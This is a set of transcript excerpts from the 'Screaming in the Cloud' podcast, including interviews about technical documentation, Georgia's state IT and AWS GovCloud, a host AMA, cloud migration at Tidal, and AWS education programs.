cup of tea. So, I got into back-end work, databases, and then I realized to make that stuff work well, you got to know the infrastructure. So, I got into that stuff. And then I realized, like, my home lab is a great place to experiment on this, so I got into Raspberry Pis, low-power computing efficiency, building your own home lab, all that kind of stuff.So, all along the way, with everything I do, I always, like, document everything like crazy. That’s something my dad taught me. He’s an engineer in radio. And he actually hired me for my first job, he had me write an IT operations manual for the Radio Group in St. Louis. And from that point forward, that’s—I always start with documentation. So, I think that was probably what really triggered that whole series. It happens to me too; I search for something, I find my old articles or my own old projects on GitHub or blog posts because I just put everything out there.Corey: I was about to ask, years ago, I was advised by Scott Hanselman to—the third time I find myself explaining something, write a blog post about it because it’s easier to refer people back to that thing than it is for me to try and reconstruct it on the fly, and I’ll drop things here and there. And the trick is, of course, making sure it doesn't sound dismissive and like, “Oh, I wrote a thing. Go read.” Instead of having a conversation with people. But as a result, I’ll be Googling how to do things from time to time and come up with my own content as a result.It’s at least a half-step up from looking at forums and the rest, where I realized halfway through that I was the one asking the question. Like, “Oh, well, at least this is useful for someone.” And I, for better or worse, at least have a pattern of going back and answering how I solved a thing after I get there, just because otherwise, it’s someone asked the question ten years ago and never returns, like, how did you solve it? What did you do? It’s good to close that loop.Jeff: Yeah, and I think over 50% of what I do, I’ve done before. When you’re setting up a Kubernetes cluster, there’s certain parts of it that you’re going to do every time. So, whatever’s not automated or the tricky bits, I always document those things. Anything that is not in the readme, is not in the first few steps, because that will help me and will help others. I think that sometimes that’s the best success I’ve found on YouTube is also just sharing an experience.And I think that’s what separates some of the content that really drives growth on a YouTube channel or whatever, or for an organization doing it because you bring the experience, like, I’m a new person to this Home Assistant, for instance, which I use to automate things at my house. I had problems with it and I just shared those problems in my video, and that video has, you know, hundreds of thousands of views. Whereas these other people who know way more than I could ever know about Home Assistant, they’re pulling in fewer views because they just get into a tutorial and don’t have that perspective of a beginner or somebody that runs into an issue and how do you solve that issue.So, like I said, I mean, I just always share that stuff. Every time that I have an issue with anything technological, I put it on GitHub somewhere. And then eventually, if it’s something that I can really formulate into an outline of what I did, I put a blog post up on my blog. I still, even though I write I don’t know how many words per week that goes into my YouTube videos or into my books or anything, I still write two or three blog posts a week that are often pretty heavy into technical detail.Corey: One of the challenges I’ve always had is figuring out who exactly I’m storytelling for when I’m putting something out there. Because there’s a plethora, at least in cloud, of beginner content of, here’s how to think about cloud, here’s what the service does, here’s why you should use it et cetera, et cetera. And that’s all well and good, but often the things that I’m focusing on presuppose a certain baseline level of knowledge that you should have going into this. If you’re trying to figure out the best way to get some service configured, I probably shouldn’t have to spend the first half of the article talking about what AWS is, as a for instance. And I think that inherently limits the size of the potential audience that would be interested in the content, but it’s also the kind of stuff that I wish was out there.Jeff: Yeah. There’s two sides to that, too. One is, you can make content that appeals to anybody, even if they have no clue what you’re talking about, or you can make content that appeals to the narrow audience that knows the base level of understanding you need. So, a lot of times with—especially on my YouTube channel, I’ll put things in that is just irrelevant to 99% of the population, but I get so many comments, like, “I have no clue what you said or what you’re doing, but this looks really cool.” Like, “This is fun or interesting.” Just because, again, it’s bringing that story into it.Because really, I think on a base level, a lot of programmers especially don’t understand—and infrastructure engineers are off the deep end on this—they don’t understand the interpersonal nature of what makes something good or not, what makes something relatable. And trying to bring that into technical documentation a lot of times is what differentiates a project. So, one of the products I love and use and recommend everywhere and have a book on—a best-selling book—is Ansible. And one of the things that brought me into it and has brought so many people is the documentation started—it’s gotten a little bit more complex over the years—but it started out as, “Here’s some problems. Here’s how you solve them.”Here’s, you know, things that we all run into, like how do you connect to 12 servers at the same time? How do you have groups of servers? Like, it showed you all these little examples. And then if you wanted to go deeper, there was more documentation linked out of that. But it was giving you real-world scenarios and doing it in a simple way. And it used some little easter eggs and fun things that made it more interesting, but I think that that’s missing from a lot of technical discussion and a lot of technical documentation out there is that playfulness, that human side, the get from Point A to Point B and here’s why and here’s how, but here’s a little interesting way to do it instead of just here’s how it’s done.Corey: In that same era, I was one of the very early developers behind SaltStack, and I think one of the reasons that Ansible won in the market was that when you started looking into SaltStack, it got wrapped around its own axle talking about how it uses ZeroMQ for a full mesh between all of the systems there, as long—sorry [unintelligible 00:07:39] mesh network that all routes—not really a mesh network at all—it talks through a single controller that then talks to all of its subordinate nodes. Great. That’s awesome. How do I use this to install a web server, is the question that people had. And it was so in love with its own cleverness in some ways. Ansible was always much more approachable in that respect and I can’t understate just how valuable that was for someone who just wants to get the problem solved.Jeff: Yeah. I also looked at something like NixOS. It’s kind of like the arch of distributions of—Corey: You must be at least this smart to use it in some respects—Jeff: Yeah, it’s—Corey: —has been the every documentation I’ve had with that.Jeff: [laugh]. There’s, like, this level of pride in what it does, that doesn’t get to ‘and it solves this problem.’ You can get there, but you have to work through the ba
Dmitry Kagansky, State CTO and Deputy Executive Director for the Georgia Technology Authority, joins Corey on Screaming in the Cloud to discuss how he became the CTO for his home state and the nuances of working in the public sector. Dmitry describes his focus on security and reliability, and why they are both equally important when working with state government agencies. Corey and Dmitry describe AWS’s infamous GovCloud, and Dmitry explains why he’s employing a multi-cloud strategy but that it doesn’t work for all government agencies. Dmitry also talks about how he’s focusing on hiring and training for skills, and the collaborative approach he’s taking to working with various state agencies.About DmitryMr. Kagansky joined GTA in 2021 from Amazon Web Services where he worked for over four years helping state agencies across the country in their cloud implementations and migrations.Prior to his time with AWS, he served as Executive Vice President of Development for Star2Star Communications, a cloud-based unified communications company. Previously, Mr. Kagansky was in many technical and leadership roles for different software vending companies. Most notably, he was Federal Chief Technology Officer for Quest Software, spending several years in Europe working with commercial and government customers.Mr. Kagansky holds a BBA in finance from Hofstra University and an MBA in management of information systems and operations management from the University of Georgia.Links Referenced: Twitter: LinkedIn: GTA Website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit to learn more. That's thanks as well to Sysdig for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Technical debt is one of those fun things that everyone gets to deal with, on some level. Today’s guest apparently gets to deal with 235 years of technical debt. Dmitry Kagansky is the CTO of the state of Georgia. Dmitry, thank you for joining me.Dmitry: Corey, thank you very much for having me.Corey: So, I want to just begin here because this has caused confusion in my life; I can only imagine how much it’s caused for you folks. We’re talking Georgia the US state, not Georgia, the sovereign country?Dmitry: Yep. Exactly.Corey: Excellent. It’s always good to triple-check those things because otherwise, I feel like the shipping costs are going to skyrocket in one way or the other. So, you have been doing a lot of very interesting things in the course of your career. You’re former AWS, for example, you come from commercial life working in industry, and now it’s yeah, I’m going to go work in state government. How did this happen?Dmitry: Yeah, I’ve actually been working with governments for quite a long time, both here and abroad. So, way back when, I’ve been federal CTO for software companies, I’ve done other work. And then even with AWS, I was working with state and local governments for about four, four-and-a-half years. But came to Georgia when the opportunity presented itself, really to try and make a difference in my own home state. You mentioned technical debt at the beginning and it’s one of the things I’m hoping that helped the state pay down and get rid of some of it.Corey: It’s fun because governments obviously are not thought of historically as being the early adopters, bleeding edge when it comes to technical innovation. And from where I sit, for good reason. You don’t want code that got written late last night and shoved into production to control things like municipal infrastructure, for example. That stuff matters. Unlike a lot of other walks of life, you don’t usually get to choose your government, and, “Oh, I don’t like this one so I’m going to go for option B.”I mean you get to do at the ballot box, but that takes significant amounts of time. So, people want above all else—I suspect—their state services from an IT perspective to be stable, first and foremost. Does that align with how you think about these things? I mean, security, obviously, is a factor in that as well, but how do you see, I guess, the primary mandate of what you do?Dmitry: Yeah. I mean, security is obviously up there, but just as important is that reliance on reliability, right? People take time off of work to get driver’s licenses, right, they go to different government agencies to get work done in the middle of their workday, and we’ve got to have systems available to them. We can’t have them show up and say, “Yeah, come back in an hour because some system is rebooting.” And that’s one of the things that we’re trying to fix and trying to have fewer of, right?There’s always going to be things that happen, but we’re trying to really cut down the impact. One of the biggest things that we’re doing is obviously a move to the cloud, but also segmenting out all of our agency applications so that agencies manage them separately. Today, my organization, Georgia Technology Authority—you’ll hear me say GTA—we run what we call NADC, the North Atlanta Data Center, a pretty large-scale data center, lots of different agencies, app servers all sitting there running. And then a lot of times, you know, an impact to one could have an impact to many. And so, with the cloud, we get some partitioning and some segmentation where even if there is an outage—a term you’ll often hear used that we can cut down on the blast radius, right, that we can limit the impact so that we affect the fewest number of constituents.Corey: So, I have to ask this question, and I understand it’s loaded and people are going to have opinions with a capital O on it, but since you work for the state of Georgia, are you using GovCloud over in AWS-land?Dmitry: So… [sigh] we do have some footprint in GovCloud, but I actually spent time, even before coming to GTA, trying to talk agencies out of using it. I think there’s a big misconception, right? People say, “I’m government. They called it GovCloud. Surely I need to be there.”But back when I was with AWS, you know, I would point-blank tell people that really I know it’s called GovCloud, but it’s just a poorly named region. There are some federal requirements that it meets; it was built around the ITAR, which is International Traffic of Arms Regulations, but states aren’t in that business, right? They are dealing with HIPAA data, with various criminal justice data, and other things, but all of those things can run just fine on the commercial side. And truthfully, it’s cheaper and easier to run on the commercial side. And that’s one of the concerns I have is that if the commercial regions meet those requirements, is there a reason to go into GovCloud, just because you get some extra certifications? So, I still spend time trying to talk agencies out of going to GovCloud. Ultimately, the agencies with their apps make the choice of where they go, but we have been pretty good about reducing the footprint in GovCloud unless it’s absolutely necessary.Corey: Has this always been the case? Because my distant recollection around all of this has been that originally when GovCloud first came out, it was a lot harder to run a whole bunch of workloads in commercial regions. And it feels like the commercial regions have really stepped up as far as what compliance boxes they check. So, is one of those stories where five or ten years ago, whenever it GovCloud first came out, there were a bunch of reasons to use it that no longer apply?Dmitry: I actually can’t go past I’ll say, seven or eight years, but certainly within the last eight years, there’s not been a reason for state and local governments to use it. At the federal level, that’s a different discussion, but for most governments that I worked with and work with now, the commercial regions have been just fine. They’ve met the compliance requirements, controls, and everything that’s in place without having to go to the GovCloud region.Corey: Something I noticed that was strange to me about the whole GovCloud approach when I was at the most recent public sector summit that AWS threw is whenever I was talking to folks from AWS about GovCloud and adopting it and launching new workloads and the rest, unlike in almost any other scenario, they seemed that their first response—almost a knee jerk reflex—was to pass that work off to one of their partners. Now, on the commercial side, AWS will do that when it makes sense, and each one becomes a bit of a judgment call, but it just seemed like every time someone’s doing something with GovCloud, “Oh, talk to Company X or Company Y.” And it wasn’t just one or two companies; there were a bunch of them. Why is that?Dmitry: I think a lot of that is because of the limitations within GovCloud, right? So, when you look at anything that AWS rolls out, it almost always rolls out into either us-east-1 or us-west-2, right, one of those two regions, and it goes out worldwide. And then it comes out in GovCloud months, sometimes even years later. And in fact, sometimes there are features that never show up in GovCloud. So, there’s not parity there, and I think what happens is, it’s these partners that know what limitations GovCloud has and what things are missing and GovCloud they still have to work around.Like, I remember when I started with AWS back in 2016
In this special live-recorded episode of Screaming in the Cloud, Corey interviews himself— well, kind of. Corey hosts an AMA session, answering both live and previously submitted questions from his listeners. Throughout this episode, Corey discusses misconceptions about his public persona, the nature of consulting on AWS bills, why he focuses so heavily on AWS offerings, his favorite breakfast foods, and much, much more. Corey shares insights into how he monetizes his public persona without selling out his genuine opinions on the products he advertises, his favorite and least favorite AWS services, and some tips and tricks to get the most out of re:Invent.About CoreyCorey is the Chief Cloud Economist at The Duckbill Group. Corey’s unique brand of snark combines with a deep understanding of AWS’s offerings, unlocking a level of insight that’s both penetrating and hilarious. He lives in San Francisco with his spouse and daughters.Links Referenced: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: As businesses consider automation to help build and manage their hybrid cloud infrastructures, deployment speed is important, but so is cost. Red Hat Ansible Automation Platform is available in the AWS Marketplace to help you meet your cloud spend commitments while delivering best-of-both-worlds support.Corey: Well, all right. Thank you all for coming. Let’s begin and see how this whole thing shakes out, which is fun and exciting, and for some godforsaken reason the lights like to turn off, so we’re going to see if that continues. I’ve been doing Screaming in the Cloud for about, give or take, 500 episodes now, which is more than a little bit ridiculous. And I figured it would be a nice change of pace if I could, instead of reaching out and talking to folks who are innovative leaders in the space and whatnot, if I could instead interview my own favorite guest: myself.Because the entire point is, I’m usually the one sitting here asking questions, so I’m instead going to now gather questions from you folks—and feel free to drop some of them into the comments—but I’ve solicited a bunch of them, I’m going to work through them and see what you folks want to know about me. I generally try to be fairly transparent, but let’s have fun with it. To be clear, if this is your first exposure to my Screaming in the Cloud podcast show, it’s generally an interview show talking with people involved with the business of cloud. It’s not intended to be snarky because not everyone enjoys thinking on their feet quite like that, but rather a conversation of people about what they’re passionate about. I’m passionate about the sound of my own voice. That’s the theme of this entire episode.So, there are a few that have come through that are in no particular order. I’m going to wind up powering through them, and again, throw some into the comments if you want to have other ones added. If you’re listening to this in the usual Screaming in the Cloud place, well, send me questions and I am thrilled to wind up passing out more of them. The first one—a great one to start—comes with someone asked me a question about the video feed. “What’s with the Minecraft pickaxe on the wall?” It’s made out of foam.One of my favorite stories, and despite having a bunch of stuff on my wall that is interesting and is stuff that I’ve created, years ago, I wrote a blog post talking about how machine learning is effectively selling digital pickaxes into a gold rush. Because the cloud companies pushing it are all selling things such as, you know, they’re taking expensive compute, large amounts of storage, and charging by the hour for it. And in response, Amanda, who runs machine learning analyst relations at AWS, sent me that by way of retaliation. And it remains one of my absolute favorite gifts. It’s, where’s all this creativity in the machine-learning marketing? No, instead it’s, “We built a robot that can think. But what are we going to do with it now? Microsoft Excel.” Come up with some of that creativity, that energy, and put it into the marketing side of the world.Okay, someone else asks—Brooke asks, “What do I think is people’s biggest misconception about me?” That’s a good one. I think part of it has been my misconception for a long time about what the audience is. When I started doing this, the only people who ever wound up asking me anything or talking to me about anything on social media already knew who I was, so I didn’t feel the need to explain who I am and what I do. So, people sometimes only see the witty banter on Twitter and whatnot and think that I’m just here to make fun of things.They don’t notice, for example, that my jokes are never calling out individual people, unless they’re basically a US senator, and they’re not there to make individual humans feel bad about collectively poor corporate decision-making. I would say across the board, people think that I’m trying to be meaner than I am. I’m going to be honest and say it’s a little bit insulting, just from the perspective of, if I really had an axe to grind against people who work at Amazon, for example, is this the best I’d be able to do? I’d like to think that I could at least smack a little bit harder. Speaking of, we do have a question that people sent in in advance.“When was the last time that Mike Julian gave me that look?” Easy. It would have been two days ago because we were both in the same room up in Seattle. I made a ridiculous pun, and he just stared at me. I don’t remember what the pun is, but I am an incorrigible punster and as a result, Mike has learned that whatever he does when I make a pun, he cannot incorrige me. Buh-dum-tss. That’s right. They’re no longer puns, they’re dad jokes. A pun becomes a dad joke once the punch line becomes a parent. Yes.Okay, the next one is what is my favorite AWS joke? The easy answer is something cynical and ridiculous, but that’s just punching down at various service teams; it’s not my goal. My personal favorite is the genie joke where a guy rubs a lamp, Genie comes out and says, “You can have a billion dollars if you can spend $100 million in a month, and you’re not allowed to waste it or give it away.” And the person says, “Okay”—like, “Those are the rules.” Like, “Okay. Can I use AWS?” And the genie says, “Well, okay, there’s one more rule.” I think that’s kind of fun.Let’s see, another one. A hardball question: given the emphasis on right-sizing for meager cost savings and the amount of engineering work required to make real architectural changes to get costs down, how do you approach cost controls in companies largely running other people’s software? There are not as many companies as you might think where dialing in the specifics of a given application across the board is going to result in meaningful savings. Yes, yes, you’re running something in hyperscale, it makes an awful lot of sense, but most workloads don’t do that. The mistakes you most often see are misconfigurations for not knowing this arcane bit of AWS trivia, as a good example. There are often things you can do with relatively small amounts of effort. Beyond a certain point, things are going to cost what they’re going to cost without a massive rearchitecture and I don’t advise people do that because no one is going to be happy rearchitecting just for cost reasons. Doesn’t go well.Someone asks, “I’m quite critical of AWS, which does build trust with the audience. Has AWS tried to get you to market some of their services, and would I be open to do that?” That’s a great question. Yes, sometimes they do. You can tell this because they wind up buying ads in the newsletter or the podcast and they’re all disclaimed as a sponsored piece of content.I do have an analyst arrangement with a couple of different cloud companies, as mentioned, and the reason behind that is because you can buy my attention to look at your product and talk to you in-depth about it, but you cannot buy my opinion on it. And those engagements are always tied to, let’s talk about what the public is seeing about this. Now, sometimes I write about the things that I’m talking about because that’s where my mind goes, but it’s not about okay, now go and talk about this because we’re paying you to, and don’t disclose that you have a financial relationship.No, that is called fraud. I figure I can sell you as an audience out exactly once, so I better be able to charge enough money to never have to work again. Like, when you see me suddenly talk about multi-cloud being great and I became a VP at IBM, about three to six months after that, no one will ever hear from me again because I love nesting doll yacht money. It’ll be great.Let’s see. The next one I have on my prepared list here is, “Tell me about a time I got AWS to create a pie chart.” I wish I’d see less of it. Every once in a while I’ll talk to a team and they’re like, “Well, we’ve prepared a PowerPoint deck to show you what we’re talking about.” No, Amazon is famously not a PowerPoint company and I don’t know why people feel the need to repeatedly prove that point to me because slides are not always the best way to convey complex information.I prefer to read documents and then have a conversation about them as Amazon tends to do. The visual approach and the bullet lists and all the rest are just frustrating. If I’m going to do a pie chart, it’s going to be in service of a joke. It’s not going to be anything that is the best way to convey information in almost any sense.“How many int
David Colebatch, CEO of Tidal, joins Corey on Screaming in the Cloud to discuss Tidal’s recent shift to a product-led approach and why empathizing with customers is always their most important job. David describes what it was like to grow the company from scratch on a boot-strapped basis, and how customer feedback and challenges inform the company strategy. Corey and David discuss the cost-savings measures cloud customers are now embarking on, and David discusses how constant migrations are the new normal. Corey and David also discuss the impact that generative AI is having not just on tech, but also on creative content and interactions in our everyday lives. About David David is the CEO & Founder of Tidal.  Tidal is empowering businesses to transform from traditional on-premises IT-run organizations to lean-agile-cloud powered machines.Links Referenced: Company website: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. Returning guest today, David Colebatch is still the CEO at Tidal. David, how have you been? It’s been a hot second.David: Thanks, Corey. Yeah, it’s been a fantastic summer for me up here in Toronto.Corey: Yeah, last time I saw you, was it New York or was it DC? They all start to run together to me.David: I think it was DC. Yeah.Corey: That’s right. Public Sector Summit where everything was just a little bit stranger than most of my conversations. It’s, “Wait, you’re telling me there’s a whole bunch of people who use the cloud but don’t really care about money? What—how does that work?” And I say that not from the position of harsh capitalism, but from the position of we’re a government; saving costs is nowhere in our mandate. Or it is, but it’s way above my pay grade and I run the cloud and call it good. It seems like that attitude is evolving, but slowly, which is kind of what you want to see. Titanic shifts in governing are usually not something you want to see done on a whim, overnight.David: No, absolutely. A lot of the excitement at the DC summit was around new capabilities. And I was actually really intrigued. It was my first time in the DC summit, and it was packed, from the very early stages of the morning, great attendance throughout the day. And I was just really impressed by some of the new capabilities that customers are leveraging now and the new use cases that they’re bringing to market. So, that was a good time for me.Corey: Yeah. So originally, you folks were focused primarily on migrations and it seems like that’s evolving a little bit. You have a product now for starters, and the company’s name is simply Tidal, without a second word. So, brevity is very much the soul of wit, it would seem. What are you doing these days?David: Absolutely. Yeah, you can find us at Yeah, we’re focused on migrations as a primary means to help a customer achieve new capabilities. We’re about accelerating their journey to cloud and optimizing once they’re in cloud as well. Yeah, we’re focused on identifying the different personas in an enterprise that are trying to take that cloud journey on with people like project, program managers, developers, as well as network people, now.Corey: It seems, on some level, like you are falling victim to the classic trap that basically all of us do, where you have a services company—which is how I thought of you folks originally—now, on some level, trying to become a product or a platform company. And then you have on the other side of it—places that we’re—“Oh, we’re a SaaS company. This is hard. We’re going to do services instead.” And it seems like no one’s happy. We’re all cats, perpetually on the wrong side of a given door. Is that an accurate assessment for where you are? Or am I misreading the tea leaves on this one?David: A little misread, but close—Corey: Excellent.David: You’re right. We bootstrapped our product company with services. And from day one, we supported our customers, as well as channel partners, many of the [larger size 00:03:20] that you know, we supported them in helping their customers be successful. And that was necessary for us as we bootstrapped the company from zero. But lately, and certainly in the last 12 months, it’s very much a product-led company. So, leading with what customers are using our software for first, and then supporting that with our customer success team.Corey: So, it’s been an interesting year. We’ve seen simultaneously a market correction, which I think has been sorely needed for a while, but that’s almost been overshadowed in a lot of conversations I’ve had by the meteoric rise and hype around generative AI. Have you folks started rebranding everything with a fresh coat of paint labeled generative AI yet as it seems like so many folks have? What’s your take on it?David: We haven’t. You won’t see a from us. Look, our thoughts are leveraging the technology as we always had to provide better recommendations and suggestions to our users, so we’ll continue to embrace generative AI as it applies to specific use cases within our product. We’re not going to launch a brand new product just around the AI theme.Corey: Yeah, but even that seems preferable to what a lot of folks are doing, which is suddenly pivoting their entire market positioning and then act, “Oh, we’ve been working in generative AI for 5, 10, 15 years,” in some cases. Google and Amazon most notably have talked about how they’ve been doing this for decades. It’s, “Cool. Then why did OpenAI beat you all to the punch on this?” And in many cases, also, “You’ve been working on this for decades? Huh. Then why is Alexa so terrible?” And they don’t really have a good talking point for that yet, but it’s the truth.David: Absolutely. Yeah. I will say that the world changed with the OpenAI launch, of course, and we had a new way to interact with this technology now that just sparked so much interest from everyday people, not just developers. And so, that got our juices flowing and creativity mode as well. And so, we started thinking about, well, how can we recommend more to other users of our system as opposed to just cloud architects?You know, how can we support project managers that are, you know, trying to summarize where they’re at, by leveraging some of this technology? And I’m not going to say we have all the answers for this baked yet, but it’s certainly very exciting to start thinking outside the box with a whole new bunch of capabilities that are available to us.Corey: I tried doing some architecture work with Chat-Gippity—yes, that is how I pronounce it—and it has led me down the primrose path a little bit because what it says is often right. Mostly. But there are some edge-case exceptions of, “Ohh, it doesn’t quite work that way.” It reminds me at some level of a junior engineer who doesn’t know the answer, so they bluff. And that’s great, but it’s also a disaster.Because if I can’t trust the things you tell me and you to call it out when you aren’t sure on something, then I’ve got to second guess everything you tell me. And it feels like when it comes to architecture and migrations in particular, the devil really is in the details. It doesn’t take much to design a greenfield architecture on a whiteboard, whereas being able to migrate something from one place to another and not have to go down in the process? That’s a lot of work.David: Absolutely. I have used AI successfully to do a lot of research very quickly across broad market terms and things like that, but I do also agree with you that we have to be careful using it as the carte blanche force multiplier for teams, especially in migration scenarios. Like, if you were to throw Chat-Gippity—as you say—a bunch of COBOL code and say, “Hey, translate this,” it can do a pretty good job, but the devil is in that detail and you need to have an experienced person actually vet that code to make sure it’s suitable. Otherwise, you’ll find yourself creating buggy things downstream. I’ve run into this myself, you know, “Produce some Terraform for me.” And when I generated some Terraform for an architecture I was working on, I thought, “This is pretty good.” But then I realized, it’s actually two years old and that’s about how old my skills were as well. So, I needed to engage someone else on my team to help me get that job done.Corey: So, migrations have been one of those things that people have been talking about for well, as long as we’ve had more than one data center on the planet. “How do we get our stuff from over here to over there?” And so, on and so forth. But the context and tenor of those conversations has changed dramatically. What have you seen this past year or so as far as emerging trends? What is the industry doing that might not be obvious from the outside?David: Well, cost optimization has been number one on people’s minds, and migrating with financial responsibility in mind has been refreshing. So, working backwards from what their customer outcomes are is still number one in our book, and when we see increasingly customers say, “Hey, I want to migrate to cloud to close a data center or avoid some capital outlay,” that’s the first thing we hear, but then we work backwards from what was their three-year plan. And then what we’ve seen so far is that customers have changed from a very IT-centric view of cloud and what they’re trying to deliver to much more business-centric. Now, they’ll say things like, “I want to be able to bring new capabilities to market more quickly. I want to be able to operate and leverage so
Valerie Singer, GM of Global Education at AWS, joins Corey on Screaming in the Cloud to discuss the vast array of cloud computing education programs AWS offers to people of all skill levels and backgrounds. Valerie explains how she manages such a large undertaking, and also sheds light on what AWS is doing to ensure their programs are truly valuable both to learners and to the broader market. Corey and Valerie discuss how generative AI is applicable to education, and Valerie explains how AWS’s education programs fit into a K-12 curriculum as well as job seekers looking to up-skill. About ValerieAs General Manager for AWS’s Global Education team, Valerie is responsible forleading strategy and initiatives for higher education, K-12, EdTechs, and outcome-based education worldwide. Her Skills to Jobs team enables governments, educationsystems, and collaborating organizations to deliver skills-based pathways to meetthe acute needs of employers around the globe, match skilled job seekers to goodpaying jobs, and advance the adoption of cloud-based technology.In her ten-year tenure at AWS, Valerie has held numerous leadership positions,including driving strategic customer engagement within AWS’s Worldwide PublicSector and Industries. Valerie established and led the AWS’s public sector globalpartner team, AWS’s North American commercial partner team, was the leader forteams managing AWS’s largest worldwide partnerships, and incubated AWS’sAerospace & Satellite Business Group. Valerie established AWS’s national systemsintegrator program and promoted partner competency development and practiceexpansion to migrate enterprise-class, large-scale workloads to AWS.Valerie currently serves on the board of AFCEA DC where, as the Vice President ofEducation, she oversees a yearly grant of $250,000 in annual STEM scholarships tohigh school students with acute financial need.Prior to joining AWS, Valerie held senior positions at Quest Software, AdobeSystems, Oracle Corporation, BEA Systems, and Cisco Systems. She holds a B.S. inMicrobiology from the University of Maryland and a Master in Public Administrationfrom the George Washington University.Links Referenced: AWS: GetIT: Spark: Future Engineers: Academy: Educate: Skill Builder: Labs: re/Start: AWS training and certification programs: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. A recurring theme of this show in the, what is it, 500 some-odd episodes since we started doing this many years ago, has been around where does the next generation come from. And ‘next generation’ doesn’t always mean young folks graduating school or whatnot. It’s people transitioning in, it’s career changers, it’s folks whose existing jobs evolve into embracing the cloud industry a lot more readily than they have in previous years. My guest today arguably knows that better than most. Valerie Singer is the GM of Global Education at AWS. Valerie, thank you for agreeing to suffer my slings and arrows. I appreciate it.Valerie: And thank you for having me, Corey. I’m looking forward to the conversation.Corey: So, let’s begin. GM, General Manager is generally a term of art which means you are, to my understanding, the buck-stops-here person for a particular division within AWS. And Global Education sounds like one of those, quite frankly, impossibly large-scoped type of organizations. What do you folks do? Where do you start? Where do you stop?Valerie: So, my organization actually focuses on five key areas, and it really does take a look at the global strategy for Amazon Web Services in higher education, research, our K through 12 community, our community of ed-tech providers, which are software providers that are specifically focused on the education sector, and the last plinth of the Global Education Team is around skills to jobs. And we care about that a lot because as we’re talking to education providers about how they can innovate in the cloud, we also want to make sure that they’re thinking about the outcomes of their students, and as their students become more digitally skilled, that there is placement for them and opportunities for them with employers so that they can continue to grow in their careers.Corey: Early on, when I was starting out my career, I had an absolutely massive chip on my shoulder when it came to formal education. I was never a great student for many of the same reasons I was never a great employee. And I always found that learning for me took the form of doing something and kicking the tires on it, and I had to care. And doing rote assignments in a ritualized way never really worked out. So, I never fit in in academia. On paper, I still have an eighth-grade education. One of these days, I might get the GED.But I really had problems with degree requirements in jobs. And it’s humorous because my first tech job that was a breakthrough was as a network administrator at Chapman University. And that honestly didn’t necessarily help improve my opinion of academia for a while, when you’re basically the final tier escalation for support desk for a bunch of PhDs who are troubled with some of the things that they’re working on because they’re very smart in one particular area, but have challenges with broad tech. So, all of which is to say that I’ve had problems with the way that education historically maps to me personally, and it took a little bit of growth for me to realize that I might not be the common, typical case that represents everyone. So, I’ve really come around on that. What is the current state of how AWS views educating folks? You talk about working with higher ed; you also talk about K through 12. Where does this, I guess, pipeline start for you folks?Valerie: So, Amazon Web Services offers a host of education programs at the K-12 level where we can start to capture learners and capture their imagination for digital skills and cloud-based learning early on, programs like GetIT and Spark make sure that our learners have a trajectory forward and continue to stay engaged.Amazon Future Engineers also provides experiential learning and data center-based experiences for K through 12 learners, too, so that we can start to gravitate these learners towards skills that they can use later in life and that they’ll be able to leverage. That said—and going back to what you said—we want to capture learners where they learn and how they learn. And so, that often happens not in a K through 12 environment and not in a higher education environment. It can happen organically, it can happen through online learning, it can happen through mentoring, and through other types of sponsorship.And so, we want to make sure that our learners have the opportunities to micro-badge, to credential, and to experience learning in the cloud particularly, and also develop digital skills wherever and however they learn, not just in a prescriptive environment like a higher education environment.Corey: During the Great Recession, I found that as a systems administrator—which is what we called ourselves in the style of the time—I was relatively weak when it came to networking. So, I took a class at the local community college where they built the entire curriculum around getting some Cisco certifications by the time that the year ended. And half of that class was awesome. It was effectively networking fundamentals in an approachable, constructive way, and that was great. The other half of the class—at least at the time—felt like it was extraordinarily beholden to, effectively—there’s no nice way to say this—Cisco marketing.It envisioned a world where all networking equipment was Cisco-driven, using proprietary Cisco protocols, and it left a bad smell for a number of students in the class. Now, I’ve talked to an awful lot of folks who have gone through the various AWS educational programs in a variety of different ways and I’ve yet to hear significant volume of complaint around, “Oh, it’s all vendor captured and it just feels like we’re being indoctrinated into the cult of AWS.” Which honestly is to your credit. How did you avoid that?Valerie: It’s a great question, and how we avoid it is by starting with the skills that are needed for jobs. And so, we actually went back to employers and said, “What are your, you know, biggest and most urgent needs to fill in early-career talent?” And we categorized 12 different job categories, the four that were most predominant were cloud support engineer, software development engineer, cyber analyst, and data analyst. And we took that mapping and developed the skills behind those four different job categories that we know are saleable and that our learners can get employed in, and then made modifications as our employers took a look at what the skills maps needed to be. We then took the skills maps—in one case—into City University of New York and into their computer science department, and mapped those skills back to the curriculum that the computer science teams have been providing to students.And so, what you have is, your half-awesome becomes full-awesome because we’re providing them the materials through AWS Academy to be able to proffer the right set of curricu
